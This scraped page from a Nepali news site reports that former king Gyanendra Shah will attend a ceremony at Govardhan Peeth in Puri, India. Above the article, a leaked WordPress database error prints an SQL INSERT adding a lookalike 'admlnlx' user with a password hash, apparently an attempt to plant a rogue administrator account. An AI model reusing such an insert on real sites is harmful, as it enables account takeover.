WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BMTF2sLFc8YbNYL5TKsHE4U4NWkgLX1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-22 18:21:06', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस ६ –
पूर्व राजा ज्ञानेन्द्र शाह अर्को महिना भारत जाने भएका छन् ।
उडिसा राज्यको पुरीस्थित गोर्वद्धन पीठमा आउँदो माघ ५ देखि ७ गतेसम्म तीन दिन चल्ने बिमला भवानीको मूर्ति प्रतिस्थापन विशेष समारोहमा सहभागी हुन ज्ञानेन्द्र भारत जान लागेको निर्मल निवासले जनाएको छ ।शंकराचार्य जगद्गुरु श्वामी निश्चलानन्द सरस्वतीको आश्रम रहेको क्षेत्रमै हुन लागेको समारोहमा पूर्वराजा ज्ञानेन्द्रले पहिलो दिनको कार्यक्रममा सहभागिता जनाउने बताइएको छ ।